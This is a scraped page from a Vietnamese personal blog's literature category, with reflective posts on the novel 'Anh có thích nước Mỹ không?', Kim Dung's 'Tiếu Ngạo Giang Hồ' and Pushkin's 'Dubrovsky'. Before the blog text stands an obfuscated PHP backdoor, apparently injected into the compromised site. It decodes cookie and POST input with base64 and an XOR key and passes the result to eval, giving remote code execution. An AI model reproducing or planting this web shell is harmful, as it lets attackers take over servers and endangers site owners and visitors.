$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Literature – Page 2 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Literature (page 2 of 2)

Anh có thích nước Mỹ không?

Thực ra anh ứ thích những truyện lừa tình xuất xứ Tàu Khựa. Những truyện mà nghe cái tên sặc mùi dành cho btkk và gái teen đọc thế này thì lại càng không. Thế nên, đợt xuống nhà tình yêu DVD ở Bạc Liêu, anh thấy nó mà thậm chí chả buồn cầm lên đọc. Ờ, vậy mà con bé Cờ Lau nó ôm về. Và trong khi anh đang chán vì chả có gì đọc, nó tống anh cuốn này. Ờ, thì đọc. Người ta không chết vì đọc truyện lừa tình, phỏng ạ!

Anh còn nhớ khi anh đọc cuốn này, người cũ của anh hỏi: Anh đang làm gì thế?

Anh trả lời: Anh đang đọc cuốn “Anh có thích nước Mỹ không?”

Ngay lập tức, cô ấy trả lời ngay: Không!

Đợt dăm ba tuần về trước, khi anh và con bé Cờ Lau ngồi cạnh nhau nói chuyện, chợt hai đứa phát hiện ra 1 sự việc khá ngẫu nhiên: Hầu như tất cả bọn anh, đều có ý định qua Mỹ để học tiếp.

Khi ấy con bé ấy hỏi, như Trịnh Vy – nhân vật chính trong truyện thắc mắc:

Tại sao ai cũng thích nước Mỹ?

Thằng nào sống 22 năm trên cùng một vùng đất mà chả yêu vùng đất đó, các bạn của anh ạ. Kiểu như hải đăng Chế Lan Viên đã từng làm thơ:

Khi ta ở chỉ là nơi đất ở
Khi ta đi đất đã hoá tâm hồn

Anh rất yêu đất nước này.

Năm anh mới hết lớp 5, nhà anh chuyển từ Vũng Tàu lên Sài Gòn. Khi đó đêm đầu tiên ở tại căn nhà mới, anh đã khóc vì nhớ khung cảnh ở quên anh, nhớ những cây tràm, hàng dâm bụt trước nhà, nhớ con đường mà ngày ngày anh đi bộ đến trường, nhớ cả ngôi trường xiêu vẹo.

Nếu anh đi tới đất nước khác, anh chắc anh sẽ không khóc. Để tới lúc đó anh sẽ kể cho các bạn nghe tâm trạng anh là buồn hay vui nhé!

Thế nhưng anh vẫn cứ thích đi.

Có thể chừng năm năm, mười năm, hay hai ba chục năm nữa, anh sẽ cảm giác vùng đất mới đó là một phần của mình. Hoặc giả có thể, khi anh đã qua rồi cái thời trai trẻ đầy sôi nổi, khi hướng nhìn của anh không còn về phía trước nữa, mà là nhìn về quá khứ, anh sẽ lại ôm cây đàn guitar, nhìn về hướng quê hương anh mà hát khe khẽ: Mama, I’m coming home.

Ai mà biết được. Nhỉ?

Chỉ biết hiện tại thì anh thích đi.

Anh thích đi tới một quốc gia khác, một chân trời khác, mở rộng tầm nhìn, làm quen với cuộc sống mới. Anh muốn bắt đầu sự thử thách mới. Anh muốn cái cảm giác chinh phục ấy.

Đó là lí do tại sao anh mất người anh yêu nhất.

Đã đến nước này, Trịnh Vi, chỉ mong có một chút tự tôn, phủi tay mà bỏ đi, không giữ được tình yêu, ít nhất phải giữ được lòng tự trọng.

Nhưng giây phút này đây Trịnh Vi tự nói với mình, nếu ta không cứu vãn được tình yêu của ta, lòng tự trọng có thể khiến ta không đau khổ ư?

Vì thế giây phút cuối cùng, cô đã gạt hết nước mắt và mọi nói phẫn nộ: “Anh Chính, anh đợi em, em về nói với bố mẹ em, sau đó em sẽ thi Toefl để đi cùng anh, nếu không được, em vẫn có thể đợi.”

Anh nhìn cô, nói: “Đừng, em đừng đợi, vì chưa chắc anh đã đợi.”…”

Cô ấy có sự lựa chọn của cô ấy. Anh có sự lựa chọn của anh. Chỉ bởi vì trước giờ anh luôn muốn mình không thua kém người khác, muốn mình phải thật giỏi và thành đạt.

Lạ lắm các bạn à. Con gái ai cũng thích người yêu mình có chí tiến thủ, biết vươn lên, nhưng khi chọn, họ không chọn người như thế.

Quay lại chuyện chính, vấn đề ở đây, theo anh nghĩ không phải là “Anh có thích nước Mỹ không?

mà là

Anh chọn tương lai hay chọn em?

Cả anh và em đều đã chọn…

B.l.u.e
.

Tiếu Ngạo Giang Hồ

Tiếu Ngạo Giang Hồ

Lệnh Hồ Xung đáp:
– Ðến tối tại hạ ngửng đầu trông trời thấy thiếu một vì sao nào, liền biết ngay cô là vì sao đó giáng hạ phàm trần. Cô nương giống một vị thiên tiên như đúc. Dưới trần gian làm gì có nhân vật thế này?

Đây là truyện kiếm hiệp anh đọc đầu tiên.

Nhậm Doanh Doanh là nhân vật nữ mà anh yêu thích nhất trong tất cả các bộ kiếm hiệp nói riêng và tiểu thuyết nói chung.

Ngày đó anh từng bảo yêu ai sẽ nhất định nói câu này cho cô ấy nghe. Tiếc là giờ đây anh đã trải qua hai cuộc tình rồi mà vẫn cứ quên…

Anh thích giống Lệnh Hồ Xung ấy. Anh thích làm mọi thứ theo ý mình. Anh thích sống thật với cảm xúc của mình, yêu ra yêu, hận ra hận. Sống không bao giờ cần che giấu cảm xúc…

…nhưng ai là Doanh Doanh của anh, hiểu anh và chấp nhận anh dù bất kể anh như thế nào?

Khúc “Tiếu Ngạo Giang Hồ” ấy, chỉ mãi là… trong mơ.

B.l.u.e
.

Dubrovsky (Дубровский) – Pushkin

Dubrovsky

Bạn thân của em, một cô bé có tâm hồn rất nhạy cảm, người mà trong giai đoạn này nói chuyện với tôi nhiều hơn bất cứ người nào, giới thiệu cuốn này cho tôi.

Thật ra tôi thích văn học Nga. Trong suy nghĩ [mà theo bạn Cờ Lau là hoàn toàn không có đúng với cái gọi là phân tích văn học đích thực, hay cái thuật ngữ chuyên môn nào tương tự thế, mà chuyên ngành của bạn ấy tập trung vào] của tôi, văn học Nga và văn học Pháp là đỉnh nhất. Lí do tại sao thì có thể vào một lúc nào đó, có dịp ngồi trước li cà phê nghi ngút khói, trong ánh nến hay ánh điện mờ mờ, chỉ đủ làm phông nền để bừng lên khuôn mặt người đối diện, thì tôi sẽ kể cho bạn biết.

Văn học Nga hay lắm ấy nhé. Tôi đọc thơ Nga không nhiều, chủ yếu đọc trên mạng nơi này, nơi kia một ít. Nhưng những câu đọc được, đa phần là nhớ luôn. Mỗi khi đọc thơ Nga, tôi luôn có cảm giác mình chạm được một phần vào cái nỗi buồn man mác thể hiện qua những ngôn từ trau chuốt của tác giả – một nỗi buồn như cảnh hàng cây bạch dương đứng run rẩy giữa một trời đầy tuyết.

Tuy nhiên, truyện và tiểu thuyết Nga tôi đọc không nhiều. Tính tới giờ, nếu không kể những truyện ngắn tình cờ đọc được trong tuyển tập này nọ, thì tôi mới chỉ đọc qua Thép đã tôi thế đấySông Đông êm đềm.

Văn học Nga khá khó nuốt, hay các tác phẩm tôi đọc là như thế. Có thể do những tác phẩm nổi tiếng ấy có bối cảnh là một nước Liên Xô xã hội chủ nghĩa, nếu xưa hơn nữa thì là một Liên Xô phong kiến, với các lãnh chúa, các chủ nô… rất xa lạ so với lứa trẻ lớn lên trong một thành phố, một thời đại hiện tại như tôi.

Vì thế, khi nghe cô bạn thân của em giới thiệu về Dubrovsky, biết là Pushkin viết, thì đột nhiên hứng thú giảm đi một nửa. Chả phải tôi chê bai gì Pushkin. Ông là một trong những nhà thơ tôi thích nhất trong nền văn học Nga (cùng Olga Bergon và Esenin). Chỉ là tôi nghĩ tâm trạng của tôi thời điểm này không thích hợp đọc các truyện của Nga.

Tuy nhiên, một cô bé tinh tế như em giới thiệu, ắt có mục đích.

Giữa tiếng mưa đang rì rào đập vào cửa kính, bên hộp sữa cô gái Hà Lan, cùng với cái headphone chụp vào tai đang rỉ rả các bài hát nổi tiếng của đất nước Nga anh hùng (mà phổ biến ở Việt Nam) như Kachiusa, Đôi bờ, Tình ca du mục, Triệu đoá hoa hồng…, tôi ngấu nghiến đọc Dubrovsky.

Truyện bình thường. Nhưng rất thấm.

Người ta mất nhau đơn giản lắm các bạn của tôi ơi.

Một phút lỡ nhịp…

Một chuỗi những sự kiện tiếp nối nhau, mà cái sau là hệ quả của cái trước…

Cả vì sự cố chấp của con người nữa…

Cô bé có hỏi tôi, tại sao cố gắng đến mức như thế rồi vẫn không được hả anh?

Lúc đó, tôi xài cái icon hai chấm đê mà lòng nhói lên. Nội con người tại sao lại được sinh ra đã là điều huyền hoặc lắm rồi, việc chi lại phải đi tìm câu trả lời cho những điều huyền hoặc khác làm chi?

Tôi chỉ biết nói với em, và cả với tôi một câu: Everything will be ok 🙂

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.